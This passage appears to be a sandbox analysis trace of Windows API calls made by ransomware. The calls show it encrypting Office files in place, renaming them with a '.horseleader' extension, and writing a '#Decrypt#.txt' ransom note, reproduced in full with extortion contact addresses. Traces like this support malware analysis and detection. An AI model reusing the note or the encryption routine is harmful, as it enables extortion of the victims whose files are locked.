Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 112 [0244.771] StrStrW (lpFirst="ProjectMUI.XML", lpSrch=".txt") returned 0x0 [0244.771] 
GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1452) returned 1 [0244.772] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.773] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.774] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.774] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.774] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.775] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.775] CloseHandle (hObject=0x15c) returned 1 [0244.775] GetProcessHeap () returned 0x780000 [0244.775] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.775] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.horseleader") returned 124 [0244.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common 
files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.horseleader")) returned 1 [0244.776] GetProcessHeap () returned 0x780000 [0244.776] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.777] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5bc88d0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.777] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.777] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 107 [0244.777] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.777] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.777] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.777] lstrlenW (lpString=".testttjffg") returned 11 [0244.777] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.777] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.777] 
CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.778] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 107 [0244.778] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.778] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1872) returned 1 [0244.778] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x750, lpOverlapped=0x0) returned 1 [0244.781] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.781] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x750, lpOverlapped=0x0) returned 1 [0244.784] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.784] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 
[0244.784] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.784] CloseHandle (hObject=0x15c) returned 1 [0244.785] GetProcessHeap () returned 0x780000 [0244.785] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.785] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.horseleader") returned 119 [0244.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.horseleader")) returned 1 [0244.786] GetProcessHeap () returned 0x780000 [0244.786] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.786] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5bc88d0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.786] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) 
returned 1 [0244.786] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\#Decrypt#.txt") returned 111 [0244.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.792] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.792] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.794] lstrlenA (lpString="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") returned 1368 [0244.794] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.794] CloseHandle (hObject=0x1a4) returned 1 [0244.794] GetProcessHeap () returned 0x780000 [0244.795] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.795] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0244.795] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0244.795] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en") returned 92 [0244.795] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0244.795] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0244.795] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.795] GetProcessHeap () 
returned 0x780000 [0244.795] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.796] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*") returned 94 [0244.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.797] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.797] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\.") returned 94 [0244.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.797] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99177d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.797] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.797] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\..") returned 95 [0244.797] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.797] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.797] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01be3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0244.798] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0244.798] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 102 [0244.798] StrStrIW (lpFirst="Proof.XML", lpSrch=".horseleader") returned 0x0 [0244.798] lstrcmpW (lpString1="Proof.XML", lpString2="#Decrypt#.txt") returned 1 [0244.798] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0244.798] lstrlenW (lpString=".testttjffg") returned 11 [0244.798] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML", lpSrch=".testttjffg") returned 0x0 [0244.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" 
(normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 102 [0244.799] StrStrW (lpFirst="Proof.XML", lpSrch=".txt") returned 0x0 [0244.799] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1347) returned 1 [0244.799] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x543, lpOverlapped=0x0) returned 1 [0244.805] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.805] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x543, lpOverlapped=0x0) returned 1 [0244.805] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.805] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.805] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.806] CloseHandle (hObject=0x15c) returned 1 [0244.806] GetProcessHeap () returned 0x780000 [0244.806] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.806] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.horseleader") returned 114 [0244.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.horseleader")) returned 1 [0244.807] GetProcessHeap () returned 0x780000 [0244.807] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.807] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01be3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x99177d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 0 [0244.807] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.807] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\#Decrypt#.txt") returned 106 [0244.807] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\#Decrypt#.txt" 
(normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.808] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.808] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.809] lstrlenA (lpString="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") returned 1368 [0244.809] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.809] CloseHandle (hObject=0x1a4) returned 1 [0244.809] GetProcessHeap () returned 0x780000 [0244.809] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.809] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0244.809] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0244.810] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es") returned 92 [0244.810] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0244.810] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0244.810] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.810] GetProcessHeap () 
returned 0x780000 [0244.810] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.810] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*") returned 94 [0244.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.811] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\.") returned 94 [0244.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.811] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.812] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
